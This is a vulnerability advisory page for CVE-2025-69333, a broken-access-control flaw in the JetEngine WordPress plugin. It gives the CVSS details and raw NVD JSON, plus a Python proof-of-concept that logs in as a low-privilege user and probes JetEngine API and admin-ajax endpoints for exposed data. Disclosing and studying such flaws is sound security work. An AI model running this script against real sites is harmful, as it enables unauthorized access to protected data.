Security Vulnerability Report
中文
CVE-2025-69333 CVSS 4.3 MEDIUM

CVE-2025-69333

Published: 2026-01-07 12:17:06
Last Modified: 2026-04-23 15:36:22
Source: [email protected]

Description

Missing Authorization vulnerability in Crocoblock JetEngine jet-engine allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects JetEngine: from n/a through <= 3.8.1.1.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

JetEngine <= 3.8.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-69333 JetEngine Broken Access Control PoC # Description: Low-privilege authenticated users can access protected JetEngine resources # Affected: JetEngine <= 3.8.1.1 import requests import sys from urllib.parse import urljoin def exploit_jetengine_cve_2025_69333(target_url, username, password): """ Exploit for Missing Authorization in JetEngine plugin Requires: Valid WordPress user account with subscriber role or higher """ session = requests.Session() # Step 1: Authenticate with WordPress login_url = urljoin(target_url, '/wp-login.php') login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies: print('[-] Authentication failed') return False print('[+] Successfully authenticated') # Step 2: Attempt to access protected JetEngine API endpoints api_endpoints = [ '/wp-json/jet-engine/v1/', '/wp-json/jet-engine/v2/', '/wp-admin/admin-ajax.php?action=jet_engine_ajax', ] for endpoint in api_endpoints: url = urljoin(target_url, endpoint) # Try to retrieve listing data (may expose sensitive info) if 'admin-ajax.php' in endpoint: data = {'handler': 'get_listings', 'post_id': '1'} resp = session.post(url, data=data) else: resp = session.get(url) if resp.status_code == 200: print(f'[+] Potential vulnerable endpoint: {url}') print(f' Response preview: {resp.text[:200]}...') print('[*] Manual verification required for full exploitation') return True if __name__ == '__main__': if len(sys.argv) < 4: print(f'Usage: python {sys.argv[0]} <target_url> <username> <password>') sys.exit(1) exploit_jetengine_cve_2025_69333(sys.argv[1], sys.argv[2], sys.argv[3])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69333", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:17:06.413", "lastModified": "2026-04-23T15:36:22.090", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Crocoblock JetEngine jet-engine allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects JetEngine: from n/a through <= 3.8.1.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/jet-engine/vulnerability/wordpress-jetengine-plugin-3-8-1-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.